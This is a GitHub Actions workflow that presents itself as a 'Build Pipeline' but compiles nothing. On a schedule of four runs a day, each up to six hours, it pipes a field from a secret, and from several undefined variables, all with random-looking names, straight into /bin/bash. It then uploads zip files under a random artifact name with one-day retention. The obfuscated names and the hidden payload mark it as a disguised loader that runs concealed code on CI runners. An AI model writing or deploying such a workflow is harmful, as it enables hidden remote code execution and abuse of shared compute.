name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '22 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          xhkt8: ${{ secrets.xhkt8 }}
        run: |
          printf '%s' "$xhkt8" | jq -r .o7 | /bin/bash
          echo $oxng5 | jq -r .ougc06682 | /bin/bash
          echo $pustp4093 | jq -r .ox36 | /bin/bash
          echo $t7759 | jq -r .zf4322 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: ei4NttVt
          path: "*.zip"
          retention-days: 1
